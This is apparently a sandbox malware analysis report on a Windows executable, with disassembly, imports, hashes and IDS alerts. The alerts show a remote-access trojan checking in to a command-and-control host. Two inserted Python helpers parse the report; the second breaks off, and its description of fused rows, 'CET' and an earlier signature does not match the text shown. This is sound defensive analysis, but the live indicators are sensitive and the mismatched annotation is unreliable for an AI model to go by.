                                                                              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......^..................%...........%.......%...@.......................... (.......(...@......@....................'.......&..5...0'.U............6'..'................................... '.....................L.&.H.....&......................text.....%.......%................. ..`.itext...&....%..(....%............. ..`.data...dZ....%..\....%.............@....bss.....x...0&..........................idata...5....&..6....&.............@....didata.......&......@&.............@....edata........'......J&.............@..@.tls....D.....'..........................rdata..].... '......L&.............@..@.rsrc...U....0'......N&.............@..@............. (......<'.............@..@........................................................
                                                                              Process:C:\Users\user\Desktop\leBwnyHIgx.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                              Process:C:\Users\user\Desktop\leBwnyHIgx.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                              Category:modified
                                                                              Size (bytes):3027728
                                                                              Entropy (8bit):7.856503406318228
                                                                              Encrypted:false
                                                                              SSDEEP:49152:sejRVM654Suz/Debm7vpElDBc4uN+C+LHseGi1pm2PfLwUA0EUEiXDSWqf16yag5:sejRVMDhe6yH1ugfHseGKtPDw50E1iTe
                                                                              MD5:B52BA2B99108C496389AE5BB81FA6537
                                                                              SHA1:9073D8C4A1968BE24357862015519F2AFECD833A
                                                                              SHA-256:C6AC7D9ADD40B913112B265D4F366D9EF80BBD711049DB085FC750FCAD4E14D8
                                                                              SHA-512:6637506EE80D359E729E0011B97E8D827E14356393193247F502B7FCFBBCA249DC045B8ACFE4B31CE462468F421DC5D9A4E31183BEDB66C45A9AA43C01F81397
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                              Joe Sandbox View:
• Filename: WPS办公软件 v76.23.66.msi, Detection: malicious
• Filename: fNlAH8RgLk.exe, Detection: malicious
• Filename: fNlAH8RgLk.exe, Detection: malicious
                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......q...5...5...5...n.......n........a/.<......&....../...n...4...n...4..........n.......n...6...5... ...........5...V...............4...5...7.......4...Rich5...........PE..L.....dc..................*.......,..ZW...,..`W...@..........................0Z......s....@.................................T-Z......`W.T.............-..H....Z..............................\W......\W.....................$PD.@...................UPX0......,.............................UPX1......*...,...*.................@....rsrc........`W.......*.............@......................................................................................................................................................................................................................................................................................................................................3.08.UPX!....
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):6.402040529665259
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 98.88%
                                                                              • Inno Setup installer (109748/4) 1.08%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:leBwnyHIgx.exe
                                                                              File size:2'581'432 bytes
                                                                              MD5:2a7776214c4870137fe8aabb231cf52e
                                                                              SHA1:3134458ad9ff7a6e76543427794fbcee1d7eda07
                                                                              SHA256:51434b554c4e3b123e0a90db3048ec6d5edaed4cdb245c8f9e3dbddb378f2845
                                                                              SHA512:e519d2d4c92e7ef921231b733eb614b800e9deba0dccdc534a668fb81bf2f925f48e87e5983ac6ccbf026e5109c7ef8e6752e16376305091745289938ecf2839
                                                                              SSDEEP:49152:Io/KpmZubPf2S8W2ILeWl+C1p9jWy5Snd0eigXNCM:T/jtYLP1Sy5E0fM
                                                                              TLSH:56C54A16B288713ED4EB1B37893386605937B661BA73CC5B5BF02A0C8F355902F3E656
                                                                              File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                              Icon Hash:3a9c4c6761cc9c31
                                                                              Entrypoint:0x65c4a4
                                                                              Entrypoint Section:.itext
                                                                              Digitally signed:true
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x5EC61809 [Thu May 21 05:56:25 2020 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:0
                                                                              File Version Major:6
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:16c8c7a62c852018ed02e453e144c998
                                                                              Signature Valid:
                                                                              Signature Issuer:
                                                                              Signature Validation Error:
                                                                              Error Number:
                                                                              Not Before, Not After
                                                                                Subject Chain
                                                                                  Version:
                                                                                  Thumbprint MD5:
                                                                                  Thumbprint SHA-1:
                                                                                  Thumbprint SHA-256:
                                                                                  Serial:
                                                                                  Instruction
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  add esp, FFFFFFF0h
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  mov eax, 00651408h
                                                                                  call 00007F18ECF562B2h
                                                                                  mov eax, dword ptr [00662788h]
                                                                                  mov eax, dword ptr [eax]
                                                                                  mov eax, dword ptr [eax+00000188h]
                                                                                  push FFFFFFECh
                                                                                  push eax
                                                                                  call 00007F18ECF5A311h
                                                                                  mov edx, dword ptr [00662788h]
                                                                                  mov edx, dword ptr [edx]
                                                                                  mov edx, dword ptr [edx+00000188h]
                                                                                  and eax, FFFFFF7Fh
                                                                                  push eax
                                                                                  push FFFFFFECh
                                                                                  push edx
                                                                                  call 00007F18ECF5A2FDh
                                                                                  xor eax, eax
                                                                                  push ebp
                                                                                  push 0065C528h
                                                                                  push dword ptr fs:[eax]
                                                                                  mov dword ptr fs:[eax], esp
                                                                                  push 00000001h
                                                                                  call 00007F18ECF59668h
                                                                                  call 00007F18ED198743h
                                                                                  mov eax, dword ptr [00651030h]
                                                                                  push eax
                                                                                  push 006510C8h
                                                                                  mov eax, dword ptr [00662788h]
                                                                                  mov eax, dword ptr [eax]
                                                                                  call 00007F18ED0EA4E8h
                                                                                  call 00007F18ED198797h
                                                                                  xor eax, eax
                                                                                  pop edx
                                                                                  pop ecx
                                                                                  pop ecx
                                                                                  mov dword ptr fs:[eax], edx
                                                                                  jmp 00007F18ED1A3AEBh
                                                                                  jmp 00007F18ECF4F028h
                                                                                  call 00007F18ED1984DFh
                                                                                  mov eax, 00000001h
                                                                                  call 00007F18ECF4FB11h
                                                                                  call 00007F18ECF4F46Ch
                                                                                  mov eax, dword ptr [00662788h]
                                                                                  mov eax, dword ptr [eax]
                                                                                  mov edx, 0065C6BCh
                                                                                  call 00007F18ED0E9FBFh
                                                                                  push 00000005h
                                                                                  mov eax, dword ptr [00662788h]
                                                                                  mov eax, dword ptr [eax]
                                                                                  mov eax, dword ptr [eax+00000188h]
                                                                                  push eax
                                                                                  call 00007F18ECF5A026h
                                                                                  mov eax, dword ptr [00662788h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x270000 | 0x97 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x26b000 | 0x35d8 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x273000 | 0xec55 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x273600 | 0x27b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x272000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x26b94c | 0x848 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x26f000 | 0x9ee | .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2581fc | 0x258200 | fa5e754e5d1c4f8bc93987d1c306d14e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x25a000 | 0x26c8 | 0x2800 | 367bc90dd8be7c6a1056ad2a82281084 | False | 0.503125 | data | 6.119631643767066 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x25d000 | 0x5a64 | 0x5c00 | c20c3606951695cd5626a53022531398 | False | 0.40281080163043476 | data | 5.055173307610014 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x263000 | 0x780c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x26b000 | 0x35d8 | 0x3600 | 6cbfeeac8d17ca3b356e9c16e6f19fc1 | False | 0.33622685185185186 | data | 5.280395234482991 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0x26f000 | 0x9ee | 0xa00 | 2726dff14c86e88d2aaa4303cf2dc681 | False | 0.36328125 | data | 4.360393246158077 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x270000 | 0x97 | 0x200 | 8c377a4128fcc7899b263e28899a337b | False | 0.251953125 | data | 1.7456444612923019 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x271000 | 0x44 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x272000 | 0x5d | 0x200 | 2f7aa57241cc0d4266afaa9ceb64679a | False | 0.189453125 | data | 1.3590642120925076 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x273000 | 0xec55 | 0xee00 | 09a0444489bc5d14abd83f9355f8763a | False | 0.2914915966386555 | data | 5.138022968656879 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
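Added example, not part of the Joe Sandbox report and not Joe Sandbox code: a small Python script that reproduces, from the section table above and the DLL import table further down, three of the derived fields the report shows. It locates the "Entrypoint Section" (entry point 0x65c4a4 minus image base 0x400000 gives RVA 0x25c4a4, which falls in .itext), computes the 8-bit Shannon entropy behind the "Entropy (8bit)" fields, and builds the normalised string that the "Import Hash" (imphash) field is the MD5 of, following the algorithm pefile implements. The section values are copied from the table; SECTIONS, SAMPLE_IMPORTS, triage_flags and its 7.0 entropy threshold are the example's own names and assumptions; the import subset is constructed from the first two rows of the import table only, so the hash it prints will not equal the report's 16c8c7a62c852018ed02e453e144c998, which covers the full table; imports by ordinal are not handled.

```python
import hashlib
import math
from typing import Iterable, List, Optional, Tuple

# Section table of leBwnyHIgx.exe copied from the report: (name, virtual
# address, virtual size, raw size, entropy). Entropy is None where the report
# lists it as "unknown" (.text). The other columns are not needed here.
SECTIONS: List[Tuple[str, int, int, int, Optional[float]]] = [
    (".text",   0x1000,   0x2581fc, 0x258200, None),
    (".itext",  0x25a000, 0x26c8,   0x2800,   6.119631643767066),
    (".data",   0x25d000, 0x5a64,   0x5c00,   5.055173307610014),
    (".bss",    0x263000, 0x780c,   0x0,      0.0),
    (".idata",  0x26b000, 0x35d8,   0x3600,   5.280395234482991),
    (".didata", 0x26f000, 0x9ee,    0xa00,    4.360393246158077),
    (".edata",  0x270000, 0x97,     0x200,    1.7456444612923019),
    (".tls",    0x271000, 0x44,     0x0,      0.0),
    (".rdata",  0x272000, 0x5d,     0x200,    1.3590642120925076),
    (".rsrc",   0x273000, 0xec55,   0xee00,   5.138022968656879),
]
IMAGE_BASE = 0x400000       # "Imagebase" field of the report
ENTRY_POINT_VA = 0x65c4a4   # "Entrypoint" field of the report

# Constructed subset of the DLL import table (first two rows only), in the
# order the report lists them; the full table is needed to reproduce the
# report's Import Hash.
SAMPLE_IMPORTS = [
    ("mpr.dll", ["WNetEnumResourceW", "WNetGetUniversalNameW",
                 "WNetGetConnectionW", "WNetCloseEnum", "WNetOpenEnumW"]),
    ("comdlg32.dll", ["GetSaveFileNameW", "GetOpenFileNameW"]),
]


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the measure behind
    the report's 'Entropy (8bit)' fields. Values near 8 mean the bytes are
    close to uniformly distributed, i.e. compressed or encrypted."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def section_for_rva(sections, rva: int) -> Optional[str]:
    """Name of the section whose virtual range covers rva, or None when the
    RVA lies outside every section (an entry point in the headers or in
    unmapped space is itself a red flag)."""
    for name, va, vsize, _raw, _ent in sections:
        if va <= rva < va + vsize:
            return name
    return None


def entry_point_section(sections, image_base: int, entry_va: int) -> Optional[str]:
    """The report's 'Entrypoint Section': entry VA minus image base is the
    RVA, which is then located in the section table."""
    return section_for_rva(sections, entry_va - image_base)


def triage_flags(sections, entropy_threshold: float = 7.0) -> List[str]:
    """Cheap packer heuristics over a section table (the threshold is this
    example's assumption, not a report setting): high-entropy sections, and
    sections with no data on disk but a large mapped size, the classic
    unpacking target (compare the UPX-packed dropped file above, entropy 7.86)."""
    flags = []
    for name, _va, vsize, raw, ent in sections:
        if ent is not None and ent >= entropy_threshold:
            flags.append(f"{name}: entropy {ent:.2f} suggests packed or encrypted content")
        if raw == 0 and vsize >= 0x10000:
            flags.append(f"{name}: no raw data but 0x{vsize:x} bytes mapped (unpacking target?)")
    return flags


def imphash_string(imports: Iterable[Tuple[str, Iterable[str]]]) -> str:
    """Normalised string the Import Hash is taken over, as pefile computes it:
    lowercase 'module.function' pairs in import-table order, comma-joined,
    with a .dll/.ocx/.sys suffix stripped from the module name. Imports by
    ordinal (pefile resolves them through per-DLL tables) are not handled."""
    parts = []
    for dll, funcs in imports:
        lib = dll.lower()
        base, dot, ext = lib.rpartition(".")
        if dot and ext in ("dll", "ocx", "sys"):
            lib = base
        parts.extend(f"{lib}.{f.lower()}" for f in funcs)
    return ",".join(parts)


def imphash(imports) -> str:
    """MD5 of the normalised import string, the value shown as 'Import Hash'."""
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


if __name__ == "__main__":
    print("entry point section:", entry_point_section(SECTIONS, IMAGE_BASE, ENTRY_POINT_VA))
    print("triage flags:", triage_flags(SECTIONS) or "none")
    print("imphash over the first two import rows:", imphash(SAMPLE_IMPORTS))
```

Because imphash is order-sensitive and case-insensitive, two builds that link the same functions in the same order hash identically even when their section hashes differ, which is why it is a better pivot across recompiled samples than the file MD5; the triage flags come back empty for this sample, consistent with the report's finding that the Inno Setup carrier is unpacked while the UPX-compressed payload it drops is not.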
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x273334 | 0xd28 | Device independent bitmap graphic, 48 x 48 x 8, image size 0, resolution 3780 x 3780 px/m, 256 important colors | | | 0.16508313539192399
RT_BITMAP | 0x27405c | 0x32a | Device independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 3779 x 3779 px/m | | | 0.2074074074074074
RT_ICON | 0x274388 | 0x2488 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9942258340461934
RT_ICON | 0x276810 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.11478507321681625
RT_ICON | 0x27aa38 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.15383817427385893
RT_ICON | 0x27cfe0 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 6720 | English | United States | 0.18284023668639054
RT_ICON | 0x27ea48 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.24108818011257035
RT_ICON | 0x27faf0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.32581967213114754
RT_ICON | 0x280478 | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 1680 | English | United States | 0.37209302325581395
RT_ICON | 0x280b30 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.4512411347517731
RT_GROUP_ICON | 0x280f98 | 0x76 | data | English | United States | 0.7288135593220338
RT_VERSION | 0x281010 | 0x514 | data | English | United States | 0.3046153846153846
RT_MANIFEST | 0x281524 | 0x731 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.40195545898967955
DLL | Import
mpr.dll | WNetEnumResourceW, WNetGetUniversalNameW, WNetGetConnectionW, WNetCloseEnum, WNetOpenEnumW
comdlg32.dll | GetSaveFileNameW, GetOpenFileNameW
comctl32.dll | FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove
shell32.dll | SHBrowseForFolderW, ExtractIconW, SHGetMalloc, SHGetFileInfoW, SHChangeNotify, Shell_NotifyIconW, ShellExecuteW, SHGetPathFromIDListW, ShellExecuteExW
user32.dll | CopyImage, CreateWindowExW, GetMenuItemInfoW, SetMenuItemInfoW, DefFrameProcW, GetDCEx, GetMessageW, PeekMessageW, MonitorFromWindow, GetDlgCtrlID, ScrollWindowEx, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, FrameRect, MapVirtualKeyW, OffsetRect, IsWindowUnicode, RegisterWindowMessageW, FillRect, GetMenuStringW, DispatchMessageW, SendMessageA, DefMDIChildProcW, EnumWindows, GetClassInfoW, GetSystemMenu, WaitForInputIdle, ShowOwnedPopups, GetScrollRange, GetScrollPos, SetScrollPos, GetActiveWindow, SetActiveWindow, DrawEdge, InflateRect, GetKeyboardLayoutList, OemToCharBuffA, LoadBitmapW, DrawFocusRect, EnumChildWindows, GetScrollBarInfo, SendNotifyMessageW, ReleaseCapture, UnhookWindowsHookEx, LoadCursorW, GetCapture, SetCapture, CreatePopupMenu, ScrollWindow, ShowCaret, GetMenuItemID, GetLastActivePopup, CharLowerBuffW, GetSystemMetrics, SetWindowLongW, PostMessageW, DrawMenuBar, SetParent, IsZoomed, CharUpperBuffW, GetClientRect, IsChild, ClientToScreen, SetWindowPlacement, IsIconic, CallNextHookEx, GetMonitorInfoW, ShowWindow, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, SetForegroundWindow, GetWindowTextW, EnableWindow, DestroyWindow, IsDialogMessageW, EndMenu, RegisterClassW, CharNextW, GetWindowThreadProcessId, RedrawWindow, GetDC, GetFocus, SetFocus, EndPaint, ExitWindowsEx, ReleaseDC, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, GetClassLongW, ActivateKeyboardLayout, GetParent, CharToOemBuffA, DrawTextW, SetScrollRange, InsertMenuItemW, PeekMessageA, GetPropW, SetClassLongW, MessageBoxW, MessageBeep, SetPropW, SetRectEmpty, UpdateWindow, RemovePropW, GetSubMenu, MsgWaitForMultipleObjects, DestroyMenu, DestroyIcon, SetWindowsHookExW, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, AdjustWindowRectEx, DrawIcon, IsWindow, EnumThreadWindows, InvalidateRect, GetKeyboardState, DrawFrameControl, ScreenToClient, SendMessageTimeoutW, BringWindowToTop, SetCursor, CreateIcon, CreateMenu, LoadStringW, CharLowerW, SetWindowPos, SetWindowRgn, GetMenuItemCount, RemoveMenu, AppendMenuW, GetSysColorBrush, GetKeyboardLayoutNameW, GetWindowDC, TranslateMessage, DrawTextExW, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, DestroyCursor, ReplyMessage, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, EnableScrollBar, GetSysColor, TrackPopupMenu, DrawIconEx, PostQuitMessage, GetClassNameW, ShowScrollBar, EnableMenuItem, GetIconInfo, GetMessagePos, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, GetCursorPos, SetCursorPos, HideCaret, GetMenu, GetMenuState, SetMenu, SetRect, GetKeyState, FindWindowExW, MonitorFromPoint, SystemParametersInfoW, LoadIconW, GetCursor, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, KillTimer, WaitMessage, IsWindowEnabled, IsDialogMessageA, TranslateMDISysAccel, GetWindowPlacement, FindWindowW, DeleteMenu, GetKeyboardLayout
version.dll | GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
oleaut32.dll | SafeArrayPutElement, LoadTypeLib, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, RegisterTypeLib, VariantChangeType, VariantCopyInd
advapi32.dll | RegSetValueExW, RegEnumKeyExW, AdjustTokenPrivileges, OpenThreadToken, GetUserNameW, RegDeleteKeyW, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegQueryInfoKeyW, AllocateAndInitializeSid, FreeSid, EqualSid, RegDeleteValueW, RegFlushKey, RegQueryValueExW, RegEnumValueW, GetTokenInformation, InitializeSecurityDescriptor, RegCloseKey, RegCreateKeyExW, SetSecurityDescriptorDacl
netapi32.dll | NetWkstaGetInfo, NetApiBufferFree
kernel32.dll | SetFileAttributesW, SetFileTime, GetACP, GetExitCodeProcess, IsBadWritePtr, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, QueryPerformanceFrequency, FindNextFileW, GetFullPathNameW, VirtualFree, ExitProcess, HeapAlloc, WriteProfileStringW, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, CompareFileTime, ReadFile, CreateProcessW, TransactNamedPipe, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, OpenMutexW, CreateThread, CompareStringW, CopyFileW, CreateMutexW, LoadLibraryA, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, MoveFileW, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, SetNamedPipeHandleState, LoadLibraryExW, TerminateProcess, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, VirtualQuery, GlobalFindAtomW, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, ReleaseMutex, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GetStartupInfoW, GlobalDeleteAtom, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, SetThreadPriority, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateNamedPipeW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetOverlappedResult, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, IsDBCSLeadByte, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
ole32.dll | StgCreateDocfileOnILockBytes, CoCreateInstance, CLSIDFromString, CoUninitialize, IsEqualGUID, OleInitialize, CoFreeUnusedLibraries, CreateILockBytesOnHGlobal, CLSIDFromProgID, OleUninitialize, CoDisconnectObject, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
gdi32.dll | Arc, Pie, SetBkMode, SelectPalette, CreateCompatibleBitmap, ExcludeClipRect, RectVisible, SetWindowOrgEx, MaskBlt, AngleArc, Chord, SetTextColor, StretchBlt, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, CreatePalette, CreateBrushIndirect, PatBlt, LineDDA, PolyBezierTo, GetStockObject, CreateSolidBrush, Polygon, Rectangle, MoveToEx, DeleteDC, SaveDC, BitBlt, Ellipse, FrameRgn, GetDeviceCaps, GetBitmapBits, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, GetSystemPaletteEntries, CreateBitmap, AddFontResourceW, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, CreatePenIndirect, SetStretchBltMode, GetDIBits, CreateFontIndirectW, PolyBezier, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, SetBkColor, CreateCompatibleDC, GetObjectW, GetBrushOrgEx, GetCurrentPositionEx, SetROP2, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, ArcTo, GdiFlush, SetPixel, EnumFontFamiliesExW, GetPaletteEntries
Name | Ordinal | Address
TMethodImplementationIntercept | 3 | 0x4aefc0
__dbk_fcall_wrapper | 2 | 0x40eb68
dbkFCallWrapperAddr | 1 | 0x66663c
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-08T07:15:05.390726+0100 | 2001046 | ET MALWARE UPX compressed file download possible malware | 3 | 47.79.48.230 | 443 | 192.168.2.4 | 49732 | TCP
2025-01-08T07:15:33.044544+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49740 | 154.82.85.107 | 15091 | TCP
2025-01-08T07:16:43.500651+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49741 | 154.82.85.107 | 15091 | TCP
2025-01-08T07:17:55.290074+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 50009 | 154.82.85.107 | 15091 | TCP
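The packet rows of this report, as the text export renders them, have the five fields (timestamp, source port, destination port, source IP, destination IP) run together, and the two fused dotted quads are genuinely ambiguous on their own (the digits "4154" can be "4" + "154" or "41" + "54"). The following is an added example, not part of the Joe Sandbox report or its tooling: it recovers the split from the field constraints (ports 1-65535 without leading zeros, octets 0-255) and uses one fact every sandbox capture guarantees, that the analysis VM (192.168.2.4 in this report) is one endpoint of every packet, to pick the unique valid reading. It then summarises per remote host how many packets went each way and which remote ports were contacted, which is the raw material behind the "Connects to many ports of the same IP" signature above. The first three sample rows are copied from the packet table; the fourth is constructed here to show a second C2 port and is not on the page.

```python
"""Rebuild fused packet rows from a Joe Sandbox text export and summarise the flows.

Added example, not part of the Joe Sandbox report. Each row is parsed by
enumerating every split that satisfies the field constraints, then keeping the
single split in which exactly one endpoint is the sandbox VM's address.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Timestamp ends with a time-zone token ("CET" on this report); the rest is digits and dots.
ROW_RE = re.compile(r"^(?P<ts>.+? [A-Z]{3,4})(?P<body>\d[\d.]*)$")

# Constructed sample input: the first three rows are copied verbatim from the
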